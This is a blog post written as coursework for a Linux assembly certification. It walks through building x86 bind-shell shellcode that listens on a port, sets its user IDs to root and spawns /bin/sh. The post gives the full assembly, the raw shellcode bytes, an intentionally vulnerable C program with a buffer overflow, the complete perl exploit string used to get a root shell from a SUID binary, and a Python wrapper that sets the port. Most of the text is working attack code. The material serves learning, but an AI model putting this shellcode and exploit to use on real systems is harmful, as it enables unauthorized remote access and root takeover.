SLAE Assignment 1 - Bind Shell

SLAE Assignment 1 - Bind Shell

Objective:

The objective of the assignment is to create a bind shell which listens and accepts incoming connection and executes shell commands using /bin/sh. 

Steps:

1. Identify all the system calls required for creating the shellcode 

2. Create the Bind shellcode 

3. Practical Execution of the shellcode

Step1:

The first step is to identify all the system calls required for the shellcode .They are

a . socket 

The Socket system call is used to create socket ( TCP or UDP ) and according to its man page it will create an endpoint for communication 

b. bind 

Binds the socket to an address and a port

c. listen 

The Listen system call makes the socket listen to incoming connections 

d. accept 

This will accept an incoming connection for the socket . 

e. dup2

Creates duplicates file descriptors so that stdin , stdout and stderr will go to our socket

f. execve 

Executes  /bin/sh 

g. setresuid 

This will set the real user ID and effective user ID of the calling process . This system call is very much important in real world exploits while doing privilege escalations .

Step2:

 

The next step is to create the assembly code .The following is the assembly code created based on the above sys calls .

;Filename - Bind_shell3.nasm global _start section .text _start: ;socket(2,1,6) push 0x6 push 0x1 push 0x2 xor ebx, ebx mov bl , 0x1 xor ecx, ecx mov ecx, esp xor eax, eax mov al, 0x66 ; system call number for socket int 0x80 mov esi, eax xor ebx,ebx push ebx push word 0x672B ; port is configured here push word 0x2 mov ecx, esp push 0x10 push ecx push esi mov bl, 0x2 mov ecx, esp xor eax, eax mov al, 0x66 int 0x80 ;listen(int sockfd, 1) push 0x1 push esi xor ebx, ebx mov bl, 0x4 mov ecx, esp xor eax, eax mov al, 0x66 int 0x80 ;accept(int sockfd,NULL,NULL) xor ebx, ebx push ebx push ebx push esi mov bl, 0x5 mov ecx, esp xor eax, eax mov al, 0x66 int 0x80 mov ebx, eax push byte 2 pop ecx loop4dup: push byte 63 pop eax int 0x80 dec ecx jns loop4dup ;setresuid(0,0,0) xor eax, eax xor ebx, ebx xor ecx, ecx cdq mov BYTE al, 0xa4 int 0x80 ;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) push BYTE 11 pop eax push ecx push 0x68732f2f push 0x6e69622f mov ebx, esp push ecx mov edx, esp push ebx mov ecx, esp int 0x80

Once the assembly code is ready we will compile and link the same and dump the opcodes using the command line fu learned during the SLAE course .

 

"\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"

Step3:

Our  final aim is to execute the shellcode in a practical way . I used the below vulnerable code . As you can easily see the code is vulnerable to a buffer overflow attack due to lack of bounds checking.

#include <stdio.h> int main(int argc, char *argv[]) { char buffer[256]; memcpy(buffer, argv[1],strlen(argv[1])); printf(buffer); }

 Lets compile the code and test for the overflow .

 As you can see the buffer overflowed and the program crashed .

Now lets try to see if we can control the EIP after the crash.

Here we can see that the EIP points to a value that we control and we know exactly where it is .
Now our aim will be to exploit the above situation .

I have made the binary SUID and given the ownership to root . now we need to prepare for our exploit.

The total bytes needed to crash the program is 272 , our shellcode is 126 bytes long and the final four bytes is the EIP .

So our exploit should look like this .

142*NOPS + shellcode + EIP

So the final exploit will become
$(perl -e 'printf "A" x 142 . "\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\xf5\xff\xbf"')

Now let us test this exploit and see the result .

Awesome , our exploit worked and we are now root .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE – 739

Wrapper Script :

#!/usr/bin/python import struct import sys #Usage: ./wrapper <port number> x = sys.argv[1] port = struct.pack("!H", int(x)) bind_shell = ("\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68" + port + "\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80") print '"' + ''.join('\\x%02x' % ord(c) for c in bind_shell) + '";'

All the files used can be found here